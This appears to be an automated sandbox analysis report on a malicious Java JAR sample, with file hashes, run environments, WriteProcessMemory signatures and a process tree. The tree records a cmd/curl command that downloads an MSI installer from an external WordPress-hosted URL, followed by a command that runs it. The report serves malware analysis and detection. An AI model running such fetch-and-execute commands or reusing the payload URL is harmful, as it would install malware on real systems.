Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
25-04-2024 01:46
Static task
static1
Behavioral task
behavioral1
Sample
2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Resource
win10v2004-20240226-en
General
-
Target
2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
-
Size
47KB
-
MD5
7f75fe01e92534899449d5191d586045
-
SHA1
a26a267dac7dfc8b8feda0a190dc845ad4f6f0ca
-
SHA256
2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371
-
SHA512
9b240cdb3d6a00821ef03c749807a3eaea5c1b065f7f88f94c5904a64f94d276a31efefb0a301549744f67a42e3dd8389a6a1d057ff1fd09a942b1b3dd5925bf
-
SSDEEP
768:s2quUO5gEeRU+aD+QusAXK9wEglRozyt8VomdfeBTcdgknm2+N9Utl:s2RvWayh9owEREmYBgnm2+y
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
java.exedescription pid process target process PID 2080 wrote to memory of 2656 2080 java.exe cmd.exe PID 2080 wrote to memory of 2656 2080 java.exe cmd.exe PID 2080 wrote to memory of 2656 2080 java.exe cmd.exe PID 2080 wrote to memory of 2532 2080 java.exe cmd.exe PID 2080 wrote to memory of 2532 2080 java.exe cmd.exe PID 2080 wrote to memory of 2532 2080 java.exe cmd.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi2⤵
-
C:\Windows\system32\cmd.execmd /c C:\downloads\aHPCrYM1.msi2⤵